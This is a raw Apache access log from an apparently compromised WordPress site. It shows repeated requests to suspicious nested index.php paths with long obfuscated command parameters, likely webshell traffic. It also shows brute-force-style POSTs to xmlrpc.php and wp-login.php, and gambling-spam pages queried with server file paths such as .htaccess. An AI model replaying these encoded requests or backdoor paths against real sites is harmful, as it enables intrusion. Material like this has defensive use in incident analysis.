142.4.205.1 - - [16/Oct/2025:19:28:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636303933372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373333372q6630653561373737326335373265643839653133633564383564626462306333222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:29:07 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:29:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636303935372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373335372q6162653066656535393035343865353732653233636136373963363436303037222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:19:30:31 -0400] "GET /?_g=1933545 HTTP/1.0" 200 25321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:29:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636303937372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373337372q3432313461653833633366343936373566376430643565313238303732666537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.129.33 - - [16/Oct/2025:19:30:52 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/post-featured-image HTTP/1.0" 200 7344 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:29:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636303939372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373339372q3938366130366435343538376662626136323061653239323539396162663032222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:30:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313031372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373431372q6337383062656262383165386137313835393566346163363864313762613662222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:30:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313033372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373433372q3134353661633964373566633066653466363139653261666236663731353366222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:30:42 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.65.196 - - [16/Oct/2025:19:31:51 -0400] "GET /?_g=1980380 HTTP/1.0" 200 25573 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:30:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313035372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373435372q3565373533626638623434616263336165623361303366376162353062633864222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:19:32:15 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/post-content HTTP/1.0" 200 7202 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:31:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313037382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373437382q6635316566373335616633383432333336336530666262663163346563633530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:19:32:36 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
142.4.205.1 - - [16/Oct/2025:19:31:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313039382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373439382q3937613537393164616633643833646636313231333032346336356539343661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
91.134.49.117 - - [16/Oct/2025:19:32:46 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:19:31:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313131382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373531382q6131653565376431383465643337393661313032366439326239316464633730222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:19:33:01 -0400] "GET /?_g=743514 HTTP/1.0" 200 24370 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.179.242 - - [16/Oct/2025:19:32:09 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
91.134.49.117 - - [16/Oct/2025:19:33:12 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:19:32:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313133382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373533382q6538356132616132313033303664623464373137313536646565306363373730222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
91.134.49.117 - - [16/Oct/2025:19:33:30 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko"
54.156.124.2 - - [16/Oct/2025:19:33:33 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com HTTP/1.0" 200 7785 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.4.213.199 - - [16/Oct/2025:19:33:37 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 7461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:19:32:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313135382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373535382q3536653865376661643864353632346539393861636235663635363038353433222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:19:33:39 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/more HTTP/1.0" 200 7197 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
91.134.49.117 - - [16/Oct/2025:19:33:54 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:19:32:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313137382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373537382q3730333438663036646634396166656132303539336462366131336432613734222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:33:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313139382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373539382q3131393266383963353139376434623165366638636538306564363830616462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
91.134.49.117 - - [16/Oct/2025:19:34:19 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:19:33:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313231382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373631382q6265363961333237623839373566366634333866316333346430666234663634222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
91.134.49.117 - - [16/Oct/2025:19:34:41 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:19:33:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313233382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373633382q6132393539363233303936653537323231343437656434643062336130643839222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:19:35:03 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/comments-title HTTP/1.0" 200 7204 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
196.251.83.229 - - [16/Oct/2025:19:35:03 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
196.251.83.229 - - [16/Oct/2025:19:35:03 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
196.251.83.229 - - [16/Oct/2025:19:35:03 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
69.197.179.242 - - [16/Oct/2025:19:33:40 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:34:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313235382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373635382q6235316433343134386436626164613363623234646462343238626563656537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:19:35:21 -0400] "GET /?_g=884699 HTTP/1.0" 200 25243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:34:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313237382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373637382q6161333937373761323230616534336466313838333637323263346161323332222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:34:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313239382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373639382q6661653534376564663634613030663631623936613662656565306462313462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:35:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313331382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373731382q3436373631636464323966383636313936353563656133376362303262666136222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [16/Oct/2025:19:36:26 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/comment-author-name HTTP/1.0" 200 7210 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
69.197.179.242 - - [16/Oct/2025:19:35:09 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:35:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313333382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373733382q3266323937643731346661626633323863323136306135306433636336343638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:35:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313335382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373735382q3365386466353838336339376535373965643465656465306239653431343866222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:36:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313337382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373737382q3538393064653530333034363937633662663835366133623962313463656166222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:36:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313339382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373739382q6630393762386262393837613630396164313363626533396134373663633439222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.152.60 - - [16/Oct/2025:19:37:51 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/buttons HTTP/1.0" 200 7327 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.65.196 - - [16/Oct/2025:19:37:56 -0400] "GET /?_g=1722680 HTTP/1.0" 200 23661 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:36:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313431382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373831382q3238336531333233653136373132313335646661613562306630646536353636222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:36:41 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:37:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313433382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373833382q6530623364356533396663393530316432623038666561363634663938373366222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:19:38:34 -0400] "GET /?_g=1604457 HTTP/1.0" 200 26422 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:37:38 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313435382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373835382q6666643435386536653865393534376339663765633838333236396265336530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:37:58 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313437382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373837382q3838633963316263653633656235306664643037373634646565633662313663222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.129.33 - - [16/Oct/2025:19:39:14 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/archives HTTP/1.0" 200 7392 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:38:18 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636313439382p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635373839382q6261623238653634623465303630356635396237666463393531336266636335222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
